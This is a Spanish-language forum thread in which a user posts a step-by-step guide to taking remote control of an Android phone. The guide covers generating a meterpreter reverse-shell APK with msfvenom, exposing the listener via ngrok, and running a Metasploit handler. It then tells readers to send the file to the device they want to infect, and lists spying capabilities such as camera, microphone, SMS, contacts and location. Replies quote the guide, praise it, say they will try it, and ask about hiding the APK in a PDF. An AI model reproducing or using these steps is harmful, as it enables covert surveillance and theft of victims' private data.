Control parcial de un dispositivo Android


Sk3?

Sk3?

Miembro muy activo
Noder

Buenas noches noders,​


Me ha costado algo de trabajo pero aqui les traigo una guia de como obtener acceso a un dispositivo Android de una manera parcial, espero que les guste. LO ESTOY EXPLICANDO COMO USO EDUCATIVO 😉

QUE SE NECESITA:

-> Una maquina virtual con Kali ( vamos a usar Metasploit) o en mi casa un sistema kali en mi ordenador
-> Un telefono con Android, en mi caso voy a usar un OPPO A94 5G

Antes de empezar me gustaria dar un consejo, si no te manejas mucho con el sistema Kali en una maquina virtual te recomiendo que te instales una version live en un pen para que te sea mas facil, pero si eres un experimentado ni le eches cuenta.

Bueno empezos con la materia:

-> El primer paso: nos intalaremos ngrok para levantar un localhost, yo he usado esta manera y me ha funciona, habra muchas pero recomiendo esta

Download ngrok

Download ngrok
ngrok.com ngrok.com
1669340048293.png



Una vez tengamos descargado ngrok y lo tengamos extraido donde queramos ( yo en el escritorio ), abriremos un terminal y ejecutaremos el siguiente comando:

./ngrok http 1234

Al ejercutarlo nos saldra lo siguiente

1669340324390.png






Se me olvida decir que si teneis cuenta en ngrok (es gratis ratas registrarse) el localhost tiene un tiempo indefinido mientras que si no nos registramos no lo tendra. Para añadir nuestro token de ngrok introduciremos este comando:



./ngrok config add-authtoken TOKENID



-> Segundo paso, saber que dirección ip vamos a emplear. Para ellos abriremos el terminal y pondremos el comando:



ifconfig



1669340894643.png




Vamos a usar la Ip que nos muestra el wlan0



Datos importantes:



LHOST: 192.168.0.19

LPORT: 1234



-> Tercer paso: creación del archivo, para ello vamos a usar MSFVENOM desde un terminal



msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=PORT > /home/kali/Desktop/Aplicacion.apk



1669342407318.png




Nos dara como resultado el siguiente archivo



1669342444279.png




-> Cuarto paso: Abriremos un terminal y escribiremos los siguientes comandos



msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST IP

set LPORT Puerto

exploit



Ya tenemos todo listo, solo falta enviar el archivo a el dispositivo que queremos infectar y listo





Con el comando help podremos ver las acciones que se pueden realizar, estas son las siguientes:



-> Grabar con el microfono

-> Tomar fotos con ambas camaras

-> Hacer streaming desde la camara seleccionada

-> Verificar el estado del dispositivo

-> Obtener un listado de las llamadas

-> Obtener un listado de los contactos

-> Obtener los SMS

->Obtener ubicacion del dispositivo

->Enviar SMS





Bueno noders esto es todo, espero que os sirva y apoyeis el post, gracias por vuestra atencion. Ahh se me olvidaba si teneis cualquier duda os respondo por aqui



1669342956847.png


No seais malos kbrnes......

 
  • Like
  • Regalar
Reacciones : LargoWinch, AKdiego48, Rodkaiser y 12 otros
Neeoozz

Neeoozz

Me follo a tu madre y me voy sin pagar
Noderador
Nodero
Noder
no tengo ni puta idea de kali ni tengo pensado hackearle los sms a mi primo, pero la verdad que buen post
 
  • Like
Reacciones : Sk3?
Sk3?

Sk3?

Miembro muy activo
Noder
Si a alguien le interesa saber el método de poder adjuntar el archivo a una foto o un pdf que me hable por md. Si lo veo muy apoyado le meto un post
 
  • Like
Reacciones : Zeeta79, Izn and Sfonts
Davix478

Davix478

@kzsp8
Noderador
Nodero
Noder
Sk3? dijo:

Buenas noches noders,​


Me ha costado algo de trabajo pero aqui les traigo una guia de como obtener acceso a un dispositivo Android de una manera parcial, espero que les guste. LO ESTOY EXPLICANDO COMO USO EDUCATIVO 😉

QUE SE NECESITA:

-> Una maquina virtual con Kali ( vamos a usar Metasploit) o en mi casa un sistema kali en mi ordenador
-> Un telefono con Android, en mi caso voy a usar un OPPO A94 5G

Antes de empezar me gustaria dar un consejo, si no te manejas mucho con el sistema Kali en una maquina virtual te recomiendo que te instales una version live en un pen para que te sea mas facil, pero si eres un experimentado ni le eches cuenta.

Bueno empezos con la materia:

-> El primer paso: nos intalaremos ngrok para levantar un localhost, yo he usado esta manera y me ha funciona, habra muchas pero recomiendo esta

Download ngrok

Download ngrok
ngrok.com ngrok.com
Ver el archivo adjunto 21271


Una vez tengamos descargado ngrok y lo tengamos extraido donde queramos ( yo en el escritorio ), abriremos un terminal y ejecutaremos el siguiente comando:

./ngrok http 1234

Al ejercutarlo nos saldra lo siguiente

Ver el archivo adjunto 21272





Se me olvida decir que si teneis cuenta en ngrok (es gratis ratas registrarse) el localhost tiene un tiempo indefinido mientras que si no nos registramos no lo tendra. Para añadir nuestro token de ngrok introduciremos este comando:



./ngrok config add-authtoken TOKENID



-> Segundo paso, saber que dirección ip vamos a emplear. Para ellos abriremos el terminal y pondremos el comando:



ifconfig



Ver el archivo adjunto 21273



Vamos a usar la Ip que nos muestra el wlan0



Datos importantes:



LHOST: 192.168.0.19

LPORT: 1234



-> Tercer paso: creación del archivo, para ello vamos a usar MSFVENOM desde un terminal



msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=PORT > /home/kali/Desktop/Aplicacion.apk



Ver el archivo adjunto 21274



Nos dara como resultado el siguiente archivo



Ver el archivo adjunto 21275



-> Cuarto paso: Abriremos un terminal y escribiremos los siguientes comandos



msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST IP

set LPORT Puerto

exploit



Ya tenemos todo listo, solo falta enviar el archivo a el dispositivo que queremos infectar y listo





Con el comando help podremos ver las acciones que se pueden realizar, estas son las siguientes:



-> Grabar con el microfono

-> Tomar fotos con ambas camaras

-> Hacer streaming desde la camara seleccionada

-> Verificar el estado del dispositivo

-> Obtener un listado de las llamadas

-> Obtener un listado de los contactos

-> Obtener los SMS

->Obtener ubicacion del dispositivo

->Enviar SMS





Bueno noders esto es todo, espero que os sirva y apoyeis el post, gracias por vuestra atencion. Ahh se me olvidaba si teneis cualquier duda os respondo por aqui



Ver el archivo adjunto 21276

No seais malos kbrnes......

Hacer clic para expandir...
muy bueno, bien redactado con algo de gracia y bastante visual, sigue asi mororomo
 
  • Like
Reacciones : Anon y Sk3?
lilsnake

lilsnake

@estrangular
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
No entiendo mucho de esto la verdad, pero creo que hasta yo lo podría hacer, además muy interesante y muy bien redactado, enhorabuena
 
  • Like
Reacciones : Sk3?
seko417

seko417

Miembro muy activo
Nodero
Noder
buen post yo no entiendo mucho, pero con lo bien escrito q esta creo q lo sabria hacer
 
  • Like
Reacciones : Sk3?
Anon

Anon

🏴‍☠️
Owner
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
Ambicionen muy ambicioso el post I like it (y)
 
  • Maravilloso
Reacciones : Sk3?
D

Drackstack

Miembro muy activo
Sk3? dijo:

Buenas noches noders,​


Me ha costado algo de trabajo pero aqui les traigo una guia de como obtener acceso a un dispositivo Android de una manera parcial, espero que les guste. LO ESTOY EXPLICANDO COMO USO EDUCATIVO 😉

QUE SE NECESITA:

-> Una maquina virtual con Kali ( vamos a usar Metasploit) o en mi casa un sistema kali en mi ordenador
-> Un telefono con Android, en mi caso voy a usar un OPPO A94 5G

Antes de empezar me gustaria dar un consejo, si no te manejas mucho con el sistema Kali en una maquina virtual te recomiendo que te instales una version live en un pen para que te sea mas facil, pero si eres un experimentado ni le eches cuenta.

Bueno empezos con la materia:

-> El primer paso: nos intalaremos ngrok para levantar un localhost, yo he usado esta manera y me ha funciona, habra muchas pero recomiendo esta

Download ngrok

Download ngrok
ngrok.com ngrok.com
Ver el archivo adjunto 21271


Una vez tengamos descargado ngrok y lo tengamos extraido donde queramos ( yo en el escritorio ), abriremos un terminal y ejecutaremos el siguiente comando:

./ngrok http 1234

Al ejercutarlo nos saldra lo siguiente

Ver el archivo adjunto 21272





Se me olvida decir que si teneis cuenta en ngrok (es gratis ratas registrarse) el localhost tiene un tiempo indefinido mientras que si no nos registramos no lo tendra. Para añadir nuestro token de ngrok introduciremos este comando:



./ngrok config add-authtoken TOKENID



-> Segundo paso, saber que dirección ip vamos a emplear. Para ellos abriremos el terminal y pondremos el comando:



ifconfig



Ver el archivo adjunto 21273



Vamos a usar la Ip que nos muestra el wlan0



Datos importantes:



LHOST: 192.168.0.19

LPORT: 1234



-> Tercer paso: creación del archivo, para ello vamos a usar MSFVENOM desde un terminal



msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=PORT > /home/kali/Desktop/Aplicacion.apk



Ver el archivo adjunto 21274



Nos dara como resultado el siguiente archivo



Ver el archivo adjunto 21275



-> Cuarto paso: Abriremos un terminal y escribiremos los siguientes comandos



msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST IP

set LPORT Puerto

exploit



Ya tenemos todo listo, solo falta enviar el archivo a el dispositivo que queremos infectar y listo





Con el comando help podremos ver las acciones que se pueden realizar, estas son las siguientes:



-> Grabar con el microfono

-> Tomar fotos con ambas camaras

-> Hacer streaming desde la camara seleccionada

-> Verificar el estado del dispositivo

-> Obtener un listado de las llamadas

-> Obtener un listado de los contactos

-> Obtener los SMS

->Obtener ubicacion del dispositivo

->Enviar SMS





Bueno noders esto es todo, espero que os sirva y apoyeis el post, gracias por vuestra atencion. Ahh se me olvidaba si teneis cualquier duda os respondo por aqui



Ver el archivo adjunto 21276

No seais malos kbrnes......

Hacer clic para expandir...
Vamos a testearlo.
 
Izn

Izn

Miembro muy activo
Noder
Sk3? dijo:
Si a alguien le interesa saber el método de poder adjuntar el archivo a una foto o un pdf que me hable por md. Si lo veo muy apoyado le meto un post
Hacer clic para expandir...
primero probaré si consigo hacerlo, pero m interesa esa info :)
 
Izn

Izn

Miembro muy activo
Noder
No me aparece el apartado wlan0, además me da error al generar el apk. A ver si me puedes ayudar…
 
Hay que estar conectado o registrado para responder aquí.
Arriba Pie